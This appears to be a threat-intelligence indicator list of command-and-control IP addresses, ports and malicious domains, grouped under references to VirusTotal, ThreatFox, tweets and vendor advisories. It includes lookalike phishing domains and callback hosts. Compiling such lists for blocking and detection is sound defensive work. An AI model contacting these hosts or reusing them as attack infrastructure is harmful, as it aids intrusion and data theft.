# Reference: https://www.virustotal.com/gui/file/30fde5ac8a0d9ae8892726c44cec9ae1b5461b5693674c51e0639b73c9840b25/detection
# Reference: https://www.virustotal.com/gui/file/2803be04664a8cbc029fa8ef12658468f9977cb7371e06649f2afa571640add0/detection

172.245.45.213:3235

# Reference: https://twitter.com/x0rPE/status/1617472916807102465
# Reference: https://tria.ge/230123-me8pvsee6y/behavioral2

http://194.110.247.26
http://45.86.86.13
194.110.247.26:443
45.86.86.13:443

# Reference: https://twitter.com/xorJosh/status/1617553360000897024

http://149.28.193.216
149.28.193.216:443

# Reference: https://www.virustotal.com/gui/file/385ce140ecdd905c02d2fed664260d4271fa59d5b3e8998730ec9ca9926d8857/detection

ads-check.com

# Reference: https://twitter.com/ScumBots/status/1618298988188340262
# Reference: https://www.virustotal.com/gui/file/90f7f2a6acaa52850e60eac82c37276cea12426a24f10cca944eaa6746cfeb65/detection

193.161.193.99:22049

# Reference: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild

http://172.86.123.228
http://64.44.168.92

# Reference: https://twitter.com/drb_ra/status/1618432623189151745

135.181.253.65:443

# Reference: https://twitter.com/r3dbU7z/status/1618940230756872200
# Reference: https://www.virustotal.com/gui/file/8bd2ae95df444e91d6f69cd4b8555928e8f456afd7cab4cbdf04949835296ff3/detection

letsdo19877.strangled.net

# Reference: https://www.virustotal.com/gui/file/0b0d87744aa21b7ed3a5cf738bd655f3aa4f9608f7a28a8ea55dee3ac5c3c838/detection

http://163.123.142.210

# Reference: https://www.virustotal.com/gui/file/b8f0ad8c5dcbf0dea665d7836fe8ec139d7156752971a41e314cd2ef67405195/detection

http://179.43.175.187

# Reference: https://twitter.com/Merlax_/status/1619375830240731137
# Reference: https://www.virustotal.com/gui/file/f50786ae8ef79be5751bb4a3ded7be56fc66eff90794594f6d13d6959a669d15/detection

http://193.47.61.200
193.47.61.200:3387

# Reference: https://www.virustotal.com/gui/file/7766d6f7cb261c2678fa6fb08096ec1a5c7169480cb6f01b583d41f926289ded/detection

156.251.172.22:5555

# Reference: https://www.virustotal.com/gui/file/9e33046dff56d64ce5df6ff69d79fc83392241cf89f34856516c0c3d3b71f51b/detection

156.251.172.22:7855

# Reference: https://www.virustotal.com/gui/file/b9124056b73e4974b94770aef72cd653a7f9f33db407b734930fc18d8b17862d/detection

156.251.172.22:8862

# Reference: https://www.virustotal.com/gui/file/87099fe915a8795c491d0617ce20d7d9617747d8dc03a90e0082ca680b147157/detection

192.241.142.215:8282

# Reference: https://twitter.com/ScumBots/status/1619915893072433154
# Reference: https://www.virustotal.com/gui/file/1d35d110df09bc6081201bdc0e22c40646ee5104959c7021f28603841f66c080/detection

92.47.181.173:25

# Reference: https://twitter.com/malwrhunterteam/status/1620130758328455168
# Reference: https://www.virustotal.com/gui/ip-address/185.200.191.77/relations
# Reference: https://www.virustotal.com/gui/file/db2455440bb46036cbb5b7652786e005a837f5e2784540faca0a5c198d8952e6/detection

docus.space
docustorein.com

# Reference: https://www.virustotal.com/gui/file/8dcb011381a43cc9501bb3209d7d2863b8efc8d4bcebbdef341653cbc19a5095/detection

drivestoragecloud.com

# Reference: https://www.virustotal.com/gui/file/4abd213238c149ad4bfce9c2ac0de09e2714f8515901640996063a768ba1ff16/detection

103.46.128.44:53158

# Reference: https://twitter.com/malwrhunterteam/status/1623396323893411840
# Reference: https://www.virustotal.com/gui/file/10dc75c51b92cfd98093ee6bb94a5cb5ec1ceab872cb026a9bb21696e966bd5b/detection

3.85.231.45:443
/n0/v1/buckets/default/ext-5dkJ19tFufpMZjVJbsWCiqDcclDw
/n0/v3/links/ping-beat/check

# Reference: https://twitter.com/malwrhunterteam/status/1623621074037489664
# Reference: https://www.virustotal.com/gui/file/b3efeaa272619d54a7224bc10257229c7b075c79e3a5eacc206cbd0e3a604409/detection
# Reference: https://www.virustotal.com/gui/file/78099c7fd0ed38c41b18d43ff81ab91ed9154d97f158aac938d2c110edc86548/detection
# Reference: https://www.virustotal.com/gui/file/47a8503a4ef87b577fc38ee67d21c150ac58d72e0dd36e3987d7d0b9dbddba5e/detection
# Reference: https://www.virustotal.com/gui/file/77928be787e85103d49a1c56d0ca07a479daabb532154022b05a9002fd4f213a/detection

43.135.172.12:1900

# Reference: https://twitter.com/drb_ra/status/1626755809282609152

cspecim.store
blog.cspecim.store

# Reference: https://twitter.com/r3dbU7z/status/1625651123414523905
# Reference: https://www.virustotal.com/gui/file/0e49e77c0c8642ed8859a99c14fec1680e5a2ac689f15134074a4629b8642283/detection
# Reference: https://www.virustotal.com/gui/file/1adc5f86acd494f70a9a7001ca94644b21118c5f87c5fbd3835572cadcdfcc9a/detection

172.245.142.98:3389
172.245.142.98:4545
172.245.142.98:60
172.245.142.99:3389
192.3.113.194:3389
htxbdz.com
mail4.htxbdz.com
mail5.htxbdz.com
mail6.htxbdz.com

# Reference: https://www.virustotal.com/gui/file/b300f2c9534c3c9012d1108b15cb8057a24196ff29d982455de48555902081b6/detection

154.247.92.203:55

# Reference: https://github.com/executemalware/Malware-IOCs/blob/main/2023-02-13%20Unknown%20Malware%20IOCs

http://46.161.40.72
/r/klf/5B876CA5C3AA0A7D

# Reference: https://www.virustotal.com/gui/file/18e254b9280a517c2cf84e73aaa23cdcf4d1e27b76deb37655d06c0a7ca5be8f/detection

3.141.210.37:17182

# Reference: https://www.virustotal.com/gui/file/794a7f6bb6bf9c1a2e0f47f36d0eb1b609f0d1de62dc50e859a6c62b77ded96c/detection

111.90.143.228:24

# Reference: https://twitter.com/ScumBots/status/1626214893740494851
# Reference: https://www.virustotal.com/gui/file/7bc2ba99e3289ac9d4939a56abfc90cb45c912aa0bed71f3084ad3cfa5898008/detection

31.210.55.103:41507

# Reference: https://twitter.com/ScumBots/status/1628016779451633664
# Reference: https://www.virustotal.com/gui/file/6c142b7ba9967a16d0a3a44ffd73713ca7cfd430eb79aa81f319e8165685528e/detection

134.122.51.63:22

# Reference: https://www.virustotal.com/gui/file/fd7d7fc9b18a81d921cd3bfa3b613f3558fcf4a31807146aa89a32776ff72954/detection

178.175.142.195:21288

# Reference: https://www.virustotal.com/gui/file/de9f00e68026508c42c1daf5fb77d78238ef01090b74d95e154aed8b8e0d5a0a/detection

178.175.142.195:57805

# Reference: https://twitter.com/malwrhunterteam/status/1628813529787555841
# Reference: https://www.virustotal.com/gui/file/d446a8aad146468b406229699b7614bfac715e1de2c8d0a6cdd626c677ee42c8/detection

wheufcvbheuywbfyhuwebfhuwef.africa
targetplay.wheufcvbheuywbfyhuwebfhuwef.africa

# Reference: https://twitter.com/ScumBots/status/1629738118159933445
# Reference: https://www.virustotal.com/gui/file/f3ac93766c4eab18906fcf0815eb01ad4409374e4736a855282237949a8ffafb/detection

34.126.190.114:22

# Reference: https://twitter.com/drb_ra/status/1629854149289422848

164.92.110.36:443

# Reference: https://www.virustotal.com/gui/file/9c1c570d490d67fde5689068726807b936d5fbe9a299a0760aa9d75e916e2305/detection

tequilamisorpresa.com/execution.php?tag=

# Reference: https://twitter.com/ScumBots/status/1630236404641824768
# Reference: https://www.virustotal.com/gui/file/000ebda7b9dbd9631ece03e1f6cddb887fe1f5913bbd04a241bc76ddf7618671/detection

34.87.98.110:22

# Reference: https://twitter.com/ScumBots/status/1630545929735401472
# Reference: https://www.virustotal.com/gui/file/b05e15ee98671f388cb1155a797e48cae944c01dd11179e5e295cdb45be3099c/detection

134.122.51.63:9001

# Reference: https://twitter.com/James_inthe_box/status/1630675575907164160
# Reference: https://app.any.run/tasks/4671f5c3-3ab2-403d-b1f6-416590ce1da0/
# Reference: https://www.virustotal.com/gui/file/416d0d7dbea6ad6e637e61a67301ffd3188af87d11e0ea7efe25e2a97e4eccf7/detection

miningpoolsforyou.com

# Reference: https://twitter.com/StopMalvertisin/status/1631318228722135047
# Reference: https://www.virustotal.com/gui/file/9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0f/detection

powpowpowff.blogspot.com

# Reference: https://twitter.com/1ZRR4H/status/1631651702763057152
# Reference: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

http://104.223.35.221
http://212.192.246.232
143.244.153.229:8090
146.70.126.178:57228
149.28.57.130:443
45.154.14.194:443
45.154.14.194:8080
160.20.147.145:8000
185.163.45.86:8000
45.146.7.20:8000
79.141.162.36:8888
80.85.156.184:8088
80.85.156.184:8085

# Reference: https://twitter.com/drb_ra/status/1631633081558859779

host.airmap.com

# Reference: https://twitter.com/ScumBots/status/1632754233039527936
# Reference: https://www.virustotal.com/gui/file/1d14e967192870bd29053933049d2e96f39839bdc85eaf483b0e38bdd8ca51aa/detection

28.106.10.80:53

# Reference: https://www.virustotal.com/gui/file/c5a641335e86b0d3d2718e52a2ea2fa8ac69c8fbb490189a7d11373974daa2c3/detection

3.67.161.133:15914

# Reference: https://twitter.com/executemalware/status/1633610231484751873
# Reference: https://github.com/executemalware/Malware-IOCs/blob/main/2023-03-08%20Unknown%20Malware%20IOCs
# Reference: https://tria.ge/230224-vjmxysab33

http://159.223.101.65

# Reference: https://twitter.com/ScumBots/status/1633827558969212928
# Reference: https://www.virustotal.com/gui/file/a7f9be04c5f609331698b762f9454ad44cb4e6195e33dc5925e9b697c5e752c0/detection

20.100.194.20:8000

# Reference: https://twitter.com/ScumBots/status/1635503601907900417
# Reference: https://www.virustotal.com/gui/file/d0b836f5c561beeb92c457ce0d37347a5f5883ffb534f3b810c028b8f18517ca/detection

34.87.122.159:9001

# Reference: https://twitter.com/abuse_ch/status/1635711819397333000
# Reference: https://www.virustotal.com/gui/file/0555c8c1ad0e7f87671050f86a2895a8843fec5412a898a429e6010d3d0b5f15/detection

fuckallav.ru

# Reference: https://twitter.com/ScumBots/status/1636476259910729731
# Reference: https://www.virustotal.com/gui/file/ece46db4c34d9fa466905781dd4655db15ae3997318731a0dab51a2a026759aa/detection

28.106.10.80:14034

# Reference: https://twitter.com/ScumBots/status/1637076541208231937
# Reference: https://www.virustotal.com/gui/file/b9324465988881f24c0fcd158131e534f62bcaba7db23386616722910b2c6ce7/detection

34.124.206.184:9001

# Reference: https://twitter.com/ScumBots/status/1637076472086122496
# Reference: https://www.virustotal.com/gui/file/f306e739afa0e5ee265168997d7c34b9e7c901502d6585f24d93003a369f9457/detection

192.46.237.69:9001

# Reference: https://twitter.com/ScumBots/status/1637203552798900224
# Reference: https://www.virustotal.com/gui/file/89f447dc083895db8e1fdab06775de3a26aa5dfb87bee7000486cb5b4c6957c1/detection

28.106.10.80:4444

# Reference: https://twitter.com/jaydinbas/status/1637788868152885251
# Reference: https://www.virustotal.com/gui/file/25bc3c2c9ae8e0e65a93f52a4950056f584b6856514e2405a229e31633537983/detection

wjecpujpanmwm.tk

# Reference: https://twitter.com/drb_ra/status/1637793804030730244

d11jof8403sg9j.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/ab9bd97e350f7131c358da0db0d78182e4b96790155b646dc773df96e317d5cd/detection

tdameretrust.com

# Reference: https://www.virustotal.com/gui/ip-address/212.87.204.124/relations
# Reference: https://www.virustotal.com/gui/file/ba770b2c7f3d106ec679220f3e6c4a433b03afd53c581100e8c959538b806ec6/detection

http://212.87.204.124
212.87.204.124:5555
datacenter11.myftp.org
shopdataserver4.sytes.net

# Reference: https://twitter.com/ScumBots/status/1639620733394636804
# Reference: https://www.virustotal.com/gui/file/b4d11693d3fb4604c6e8f03b4967117d1af261907760bd0f78237df7a701f182/detection

34.124.190.131:9001

# Reference: https://twitter.com/sicehice/status/1639101351635369986

http://54.177.246.246

# Reference: https://twitter.com/ScumBots/status/1641171832140189696
# Reference: https://www.virustotal.com/gui/file/a834e4bfd6830bb7e4327fddd04e5016a3205850c4e7ba93ee8eeb7f202bc2f0/detection

173.249.15.168:4445

# Reference: https://www.virustotal.com/gui/file/505c33f56fe6d317aaa10ae05a9484585391c7b46fb13f65442eb0e86c34dd43/detection

144.168.46.50:7000
worknow.con-ip.com

# Reference: https://twitter.com/keydet89/status/1646928107864207362

103.253.43.5:30580

# Reference: https://www.virustotal.com/gui/file/76f49e8ccba8a9195fe9b8f2e2ff80d1128565ad1f7e42e4755423feb77f1470/detection

faceappinc.com

# Reference: https://twitter.com/malwrhunterteam/status/1650469422404886528
# Reference: https://www.virustotal.com/gui/ip-address/128.140.1.67/relations
# Reference: https://www.virustotal.com/gui/file/5e79a0a4a891aa33b2255df4d171e1c51882fd33d03591f801442c06f9fd38a8/detection
# Reference: https://www.virustotal.com/gui/file/0968da23ead738f7a1dd25acb456b5c79d6f62d5a1b0a3bdb93d2b855418149f/detection
# Reference: https://www.virustotal.com/gui/file/8f9fa90f6de669f9492a1a524fbefdda74499f4a047539b0388575f07f14f909/detection

aghbh73ehefiv787ywe8ads.com
o8i9asf86v76t3y67t63gg.cn
ptiva.fun
rytha.top

# Reference: https://twitter.com/ScumBots/status/1649978986045349890
# Reference: https://www.virustotal.com/gui/file/c8e7181a5926feae8db19b5007326f00a6b2cbee18343576b5f18ef4d165aded/detection

62.171.159.243:8080

# Reference: https://twitter.com/pmelson/status/1650976633828921344
# Reference: https://twitter.com/pmelson/status/1650980285343825923

105.105.6.114:9000
eeeeeeee0000001.ddns.net

# Reference: https://www.virustotal.com/gui/file/7f5fb027de46a8cf2436d2e7a768150d63154cb02379ef34f504367cf3bb9cf4/detection

45.82.69.203:443

# Reference: https://twitter.com/ScumBots/status/1651275024358162438
# Reference: https://www.virustotal.com/gui/file/b5c6be6a443762f5173d0c675ccaabf556851f27b287c4fd4449b9c9c83556ea/detection

142.132.183.135:4444

# Reference: https://twitter.com/jaydinbas/status/1651632311937507329
# Reference: https://www.virustotal.com/gui/file/a58da133b8aedcdca44489bf5bac98a1257f050af186620c8c0bae110f1e672b/detection

storage-cloud.ddns.net

# Reference: https://www.virustotal.com/gui/file/3028df18abecde50bca9d535f5ed9603a69f90a3ef9dfe2cd48f3e52d70fda2f/detection

81.19.141.20:31338

# Reference: https://twitter.com/r3dbU7z/status/1652177054589132801

18.222.184.115:4443
tcspune.co

# Reference: https://twitter.com/ScumBots/status/1653008955302445059
# Reference: https://www.virustotal.com/gui/file/b04cbe549f89af4695e80f2cb4baef7b43b0b88e29647f13c9b3e3871496a1ee/detection

34.142.174.196:9001

# Reference: https://twitter.com/pmelson/status/1654202794792853504

http://89.108.99.150
95.163.240.184:8000

# Reference: https://www.virustotal.com/gui/file/1ad299cbd28b33a9990715d79a9e27ac900114b7466cc6838ec66aaa85a68070/detection

sifibv.fun

# Reference: https://www.virustotal.com/gui/file/e942269f4344075f700c66969e50065d70d9c8686dc020c7ead42cd28858e540/detection

194.213.3.170:7000
winhost.con-ip.com

# Reference: https://twitter.com/souiten/status/1658059802201964545
# Reference: https://www.virustotal.com/gui/file/0d70893cd0ac11d0620faed3ee22bf8db61c430ea3ff862045cd632e714e767f/detection

18.228.115.60:18632
18.231.93.153:18632
54.94.248.37:18632

# Reference: https://twitter.com/malwrhunterteam/status/1658197993273565187
# Reference: https://www.virustotal.com/gui/file/ff5d3736cb0f0d09bce42c5d6d6b6c4ac126a378028e4bd5c8ca8d47f3585530/detection

http://91.134.166.20
91.134.166.20:8888

# Reference: https://twitter.com/malwrhunterteam/status/1659483903399272448
# Reference: https://www.virustotal.com/gui/file/bcfb1cf90d507fbbc52217d35d84d3dd3c55bcc3cf825ef35e4b829525544b7c/detection
# Reference: https://www.virustotal.com/gui/file/a7317dfa2e5fd9bc944a84cd7fd72d943377b567cd186eeea2af5066b28ff0a9/detection

217.12.218.107:25928
217.12.218.107:30139

# Reference: https://x.com/malwrhunterteam/status/1911894843632071088
# Reference: https://www.virustotal.com/gui/ip-address/37.143.10.156/relations
# Reference: https://www.virustotal.com/gui/file/91834c3c11d6b48dab2938d347907d8ef8d0353092e0a32494875e50b100dc7d/detection

documents-drive.com
ducumentsrepository.info

# Reference: https://x.com/JAMESWT_WT/status/1912127891107643801
# Reference: https://www.virustotal.com/gui/file/44cb60c9bb448b33549b2002a84fd56483bbb17fab3f1d861a7f4256a063bbb5/detection

ms-coauth.com

# Reference: https://x.com/k3yp0d/status/1840737328681120219
# Reference: https://app.validin.com/detail?type=ip&find=45.147.228.17#tab=resolutions
# Reference: https://app.validin.com/detail?type=ip&find=45.61.133.102#tab=resolutions
# Reference: https://www.virustotal.com/gui/file/757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78/detection

emotionsforsale.shop
onedriveview.shop
securedonline.net

# Reference: https://www.virustotal.com/gui/file/28060272b537b023d19c03baead2e218f53a65b66cfc2da8b1daa97b9647e8e5/detection

34.87.124.163:9001

# Reference: https://www.virustotal.com/gui/file/1add3c29ce97618963a134bf62210158e673bae68def105343c36553005d3ef1/detection
# Reference: https://www.virustotal.com/gui/file/7095b88ff7dd5f5c13ac2bcc59cf66cacdfb0b4190172edf6a91e3abdbc8faec/detection
# Reference: https://www.virustotal.com/gui/file/8190ddbfc7c18eebeb0c4444faf57b30b74f23f523b2e6330aac6f06aa233a6b/detection

http://144.91.82.35
144.91.82.35:1234
recon.wleberre.fr
traefik.wleberre.fr

# Reference: https://www.virustotal.com/gui/file/88a6c349783d253832cfe99a610cfd5232d9d542959930077850c9730acb5580/detection

193.161.193.99:24466

# Reference: https://www.virustotal.com/gui/file/54409d93f527e796b88c4ebdcf2224e8559cdc97e6720eb99ba04f1258d04477/detection

103.203.221.232:5555

# Reference: https://www.virustotal.com/gui/file/22c9e750c38078ccaa1ba4d54fdf08a8974304fd761620a164c8804f12601787/detection

3.125.209.94:18859

# Reference: https://www.virustotal.com/gui/file/7ea4f35d8d316416e7ae0e5b4fe5a67e48254a392af2ee372d17bb98646d0c8e/detection

34.142.250.168:9001

# Reference: https://www.virustotal.com/gui/file/522cf9ec022cd77ca08afe8c1b2d7ad468601193e98cec074034702db36d7a21/detection

http://194.55.224.183

# Reference: https://www.virustotal.com/gui/file/404b3b8eb3635f2d7d25794af53ee63870b8fa8b9f85e5cf65890964ffedd8b4/detection

arianpardaz.ir

# Reference: https://www.virustotal.com/gui/file/b069a9f636161914c000badcc2097eb195d2fb3c566f286d81bd803a1326b411/detection

http://185.106.93.175

# Reference: https://www.virustotal.com/gui/ip-address/121.127.33.21/relations
# Reference: https://www.virustotal.com/gui/file/8b987c555eeb667b602c7abf81205f3f3b8c585d7fd112f271548fa5adb2872b/detection

121.127.33.21:443
v4ink.shop

# Reference: https://twitter.com/ScumBots/status/1680564271149621249
# Reference: https://www.virustotal.com/gui/file/c01068e733eb7056b1c9c6ec8692c379c28fa775445755ee913153ca2e69fc6b/detection

77.74.198.52:5252

# Reference: https://www.virustotal.com/gui/file/09a230c8d2534c93ef9a87c0869bd5ba04cb2b0f2e6d5e3d767b5cc088e830a9/detection

35.183.18.77:4444

# Reference: https://www.virustotal.com/gui/file/4d854ff95d848fae253dd1803549268b190c1f8b422ab58470afa33720f21423/detection

194.26.135.112:443

# Reference: https://www.virustotal.com/gui/file/80c788e8b6f97287525c9d397811e6d06bc6f2bf6462635b3d4e47850a3ecd0b/detection

34.124.235.86:9001

# Reference: https://app.any.run/tasks/d2f4eb73-16d9-4c17-844e-a38aa4fd8833/

cff66d08-d3f8-42db-911c-ce670399a441.usrfiles.com

# Reference: https://www.virustotal.com/gui/file/0d0c3b34ca6fdea82bbc6997d4c9e76f5a10bb290bb75caaa40db2083c33bb85/detection

81.80.40.49:5567

# Reference: https://www.virustotal.com/gui/file/767aab9584af0b1b5fa71311c60d8338bb696cabe1a94783eb4ac3c70e80872b/detection

195.164.49.184:5060
fileless.ecsc23.hack.cert.pl

# Reference: https://www.virustotal.com/gui/file/8b6d6e78ad91bbf07fa4bebbe2060d2bf3f5e0812133e38c45b95622a40a8ea9/detection

165.22.120.187:1337

# Reference: https://twitter.com/drb_ra/status/1682766283266244608
# Reference: https://app.any.run/tasks/a20b7b3b-993e-4fff-87cd-1ee4118d5107/

94.198.53.89:443
microsoft-support.zapto.org

# Reference: https://www.virustotal.com/gui/file/a127dc707f592712f4437a04b9a926e3972715c84a0a41d8810010c935e4a281/detection

azuremigration.westus3.cloudapp.azure.com

# Reference: https://www.virustotal.com/gui/file/1cad453ece89801b6a2390901855ae9795c0489252bc3738065a0b0dba990eb2/detection

http://192.169.69.69

# Reference: https://twitter.com/sicehice/status/1675995894716530690

167.172.75.230:443
167.172.75.230:8000

# Reference: https://www.virustotal.com/gui/file/fc4f9388511935eb60dd0ce6a20f2283ae2a3a3e0dcb82968216c007d2181d97/detection

89.189.163.174:4443

# Reference: https://twitter.com/sicehice/status/1687598958854524928

173.254.247.87:8080
192.210.174.143:8089

# Reference: https://www.virustotal.com/gui/file/c0e5098c8da2e4b299cde8eebb6dd9d584428ee85d7f045bace94a4c1cfbb341/detection

85.239.243.243:8080

# Reference: https://twitter.com/sicehice/status/1688562143770161152
# Reference: https://www.virustotal.com/gui/file/64a3aec5e48da6f14945e536895c2571d3bf3e55a779f01376ad76af85d764ad/detection

44.238.8.1:9001
starkiller.cc

# Reference: https://www.virustotal.com/gui/file/8b9c05a1e4a3b701bf8d2229a70bc83cc25b975ab16dbc2a2d0f98d319eeae0a/detection
# Reference: https://www.virustotal.com/gui/file/2d7834a739b77aabd8a7b9ce98a5bcf9a7deec15e6b1f3a921f7b3ad8a6d2d11/detection
# Reference: https://www.virustotal.com/gui/file/25a93411b5cc6b5162ae2410ed17e095393c2136de81626fbbe88906d5017602/detection

netdisk.780wow.com
netdisk.ddnsgeek.com

# Reference: https://twitter.com/malwrhunterteam/status/1689237232899502082

38.105.232.166:8080

# Reference: https://www.virustotal.com/gui/file/6c5816812ad2b8dcf1bdf8e7a393c283202f85b1c998c899639579c3458abc26/detection

77.74.198.52:8083

# Reference: https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors
# Reference: https://otx.alienvault.com/pulse/5d2da19e3055b91559471028

adm.esurf.info
green.4107irishivy.info
green.dddownhole.com
green.nogel.tech
red.1407cty13pec.com
red.340airport.com
sad.childrensliving.com
space.4fallingstar.info
stats.emeraldsurfwatermanagement.com
wws.rheovesthr.com

# Reference: https://twitter.com/sicehice/status/1689823307351146496

146.190.92.173:8000
159.65.140.154:443
159.65.140.154:8000

# Reference: https://twitter.com/ScumBots/status/1690282049406464000
# Reference: https://www.virustotal.com/gui/file/a1d92d7aaf76c140263408d888b089932b91ddbd647ed62370d717b051e3ca93/detection

146.70.158.173:8080

# Reference: https://github.com/conexioninversa/WOPR/blob/main/C2_Posh.txt (# 2023-08-12)

103.230.142.243:443
3.70.143.123:443
3.78.75.167:443
62.182.159.155:443

# Reference: https://twitter.com/ScumBots/status/1691170399625572353
# Reference: https://www.virustotal.com/gui/file/e606be399e9435970268ba6f0e552f6426b229ff62a30fd61256733282937261/detection

96.27.38.90:443

# Reference: https://twitter.com/ULTRAFRAUD/status/1692807375395094961
# Reference: https://www.virustotal.com/gui/file/a70d2999b817814f006a7f3e0bda9a69e8be0d4835e9c03cc3d39aa3e0a510e7/detection
# Reference: https://www.virustotal.com/gui/file/a8a9859f09378a4efd8802691e6ddf6aa0ae9fd4182149cee44c2fc0beb98fbb/detection

103.145.13.69:13337
103.145.13.69:8181
h4ck0ps.cc
vms.h4ck0ps.cc

# Reference: https://twitter.com/sicehice/status/1694535541671268748

http://35.174.153.211
35.174.153.211:443

# Reference: https://twitter.com/sicehice/status/1694542540563755127

38.145.203.20:8000

# Reference: https://twitter.com/sicehice/status/1694546485864435835

95.163.168.155:8000

# Reference: https://twitter.com/sicehice/status/1694537861012267015

37.59.41.105:8080

# Reference: https://twitter.com/ScumBots/status/1694590454094787006
# Reference: https://www.virustotal.com/gui/file/b312edcf516092e0b3caecc4f75e30f8c893d995fecceeccb1a82c5d622af3ed/detection

http://43.142.102.110

# Reference: https://twitter.com/drb_ra/status/1696696188978745773

45.79.196.203:443

# Reference: https://www.virustotal.com/gui/file/01bb93056a4e243f6c65298f68568819a0719abd56ed9c271bd53009a3a47542/detection

cg7cy082vtc00008r4sggedsxyeyyyyyb.oast.fun

# Reference: https://twitter.com/ScumBots/status/1698926512676757876
# Reference: https://www.virustotal.com/gui/file/6ab9f03168ef97048e9a4c38572a5c3491550ecc207ad6794a0af14dbe262b22/detection

103.189.234.23:8080

# Reference: https://twitter.com/ScumBots/status/1699749435872346462
# Reference: https://www.virustotal.com/gui/file/fce494b4dbbadbfc64925ac00092a8465ccb2c7ec18153798fac517ae9289f90/detection

173.44.141.140:443

# Reference: https://twitter.com/ScumBots/status/1700053942464360662
# Reference: https://www.virustotal.com/gui/file/4210fb29431b8f05f68b2b488454cd3d7db8b5fcf8a723fbbc9434073385f3ba/detection

11.239.125.213:5439

# Reference: https://twitter.com/ScumBots/status/1699466347053281617
# Reference: https://www.virustotal.com/gui/file/8280fc83a755f6b9e8a8ba8895d00f5c9f6537815246bcd037436f6efa123ce5/detection

1.15.157.229:8080

# Reference: https://www.virustotal.com/gui/file/7e1180455a5558850a07f4ce55b245f948fe8cbd234585999e55c6ac33f26d49/detection

156.223.95.69:4444
0x0.sytes.net

# Reference: https://www.virustotal.com/gui/file/35192d4d74912cc9fcc11fb8ddb9f7623017433ed6dcab72e7386fd5d5a3e419/detection
# Reference: https://www.virustotal.com/gui/file/7775055c940a803de65a81a6b8948b8d0bb2e362fdc241535becf00c73e6a0d4/detection

http://103.68.109.31
103.68.109.31:1337

# Reference: https://twitter.com/r3dbU7z/status/1705654727176777736

138.201.121.107:2222

# Reference: https://twitter.com/jaydinbas/status/1706289240781308236

macores.com

# Reference: https://www.virustotal.com/gui/file/259ad9bd08ed475a5544f37c11e7d4a18c8feffe50e1be9944de1ff20ccaee6c/detection

3.126.37.18:12533

# Reference: https://www.virustotal.com/gui/file/2b07b93de86a3a206484cb65893556da14810f29737ce1301cd4252869629711/detection

79.110.196.41:9005

# Reference: https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala

4.216.137.19:443
4.216.137.19:8080

# Reference: https://twitter.com/_JohnHammond/status/1708910264261980634

103.163.187.12:8080
/cz3eKnhcaD0Fik7Eexo66A

# Reference: https://twitter.com/drb_ra/status/1709382606972653886

135.181.37.202:443

# Reference: https://www.virustotal.com/gui/file/8e7a257076b6e97b4d50e99426598607241dfddd376b7a3b8b128b8f60415c0c/detection

testrain.s3.us-west-1.amazonaws.comc

# Reference: https://threatfox.abuse.ch/browse/malware/win.poshc2/ (# 2023-10-11)

103.39.230.213:3790
157.245.128.27:443
18.134.14.164:443
185.255.79.26:3790
46.243.186.112:3790
51.250.38.28:443
68.183.227.107:444
70.77.124.96:8443
94.198.53.143:443
94.23.228.43:443

# Reference: https://twitter.com/ScumBots/status/1712717382886560036
# Reference: https://www.virustotal.com/gui/file/4f97115e2fffc6c52bcf715b0c54152bcc95811dfdabfca02d0f136ecfbac9a3/detection

45.128.232.86:9001

# Reference: https://twitter.com/ScumBots/status/1711390002867732883
# Reference: https://www.virustotal.com/gui/file/b7c49151c1cf72e7a366cb0d5daf70492d05ebaed4f9264102d5b9f02f890109/detection

lovelace.loophole.site

# Reference: https://twitter.com/ScumBots/status/1712838182587228272
# Reference: https://www.virustotal.com/gui/file/8d5378448b2ac7511a59ad7fe8b3026f3a04f8f956a382ed852ae7f2fca57fc9/detection

45.128.232.86:1337

# Reference: https://threatfox.abuse.ch/ioc/1189595/

88.210.9.139:443

# Reference: https://threatfox.abuse.ch/ioc/1189901/

185.234.216.64:443

# Reference: https://twitter.com/banthisguy9349/status/1757768177696571871

185.234.216.64:8000

# Reference: https://threatfox.abuse.ch/ioc/1191031/

159.100.29.105:8888

# Reference: https://www.virustotal.com/gui/ip-address/181.56.166.194/detection

http://181.56.166.194

# Reference: https://threatfox.abuse.ch/ioc/1191345/

213.219.37.158:443

# Reference: https://www.virustotal.com/gui/ip-address/130.61.40.154/detection

http://130.61.40.154

# Reference: https://twitter.com/ScumBots/status/1717576908685053966
# Reference: https://www.virustotal.com/gui/file/b6e4d8b5d4b3fc1c45673cd91d0fd54da4706ecc63f9821a161fdea05ce8fee0/detection

34.87.67.111:9001

# Reference: https://twitter.com/ScumBots/status/1717576983251390579
# Reference: https://www.virustotal.com/gui/file/c9d39adf22200b9ac92bc07e6dd12c1c30562ca6819b5a1182142c5c8bb1dbed/detection

139.144.176.53:9001

# Reference: https://threatfox.abuse.ch/ioc/1196098/

3.253.77.60:443

# Reference: https://www.sentinelone.com/blog/threat-actors-actively-exploiting-progress-ws_ftp-via-multiple-attack-chains/
# Reference: https://otx.alienvault.com/pulse/6525605d7e0da326e806369b

2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
bgvozb1wnz86q952zxjlwusv2m8gw5.oastify.com
qzt3iqkb6erl9oohic20f9bal1rsfh.oastify.com

# Reference: https://threatfox.abuse.ch/ioc/1197635/

13.48.77.144:443

# Reference: https://twitter.com/malwrhunterteam/status/1719817510063649096
# Reference: https://twitter.com/malwrhunterteam/status/1719814620146196785
# Reference: https://www.virustotal.com/gui/file/4ea37ddd66bb4ece8c16eb02a016f45650a1e5677454533d3f1d3fd2c61f040b/detection
# Reference: https://www.virustotal.com/gui/file/be4d6ecea23712790a13f4d538a5bc9feaaa61054f7fd9d0cb45d304a1129250/detection

communications-stream.azurewebsites.net
globalupdates.azurewebsites.net

# Reference: https://twitter.com/malwrhunterteam/status/1719778744531915103
# Reference: https://www.virustotal.com/gui/file/7f5fd51b97907e7dbad4a79aea928d562d93dc56dd7320a6823dcd55fe1b727c/detection

shdf.global.ssl.fastly.net

# Reference: https://twitter.com/Gi7w0rm/status/1721564409800142986
# Reference: https://www.virustotal.com/gui/file/cb6768fc529a0124cfb417faa72bbbc47942d8594d7f36bf40595f25c1bd1e73/detection

http://193.149.129.136
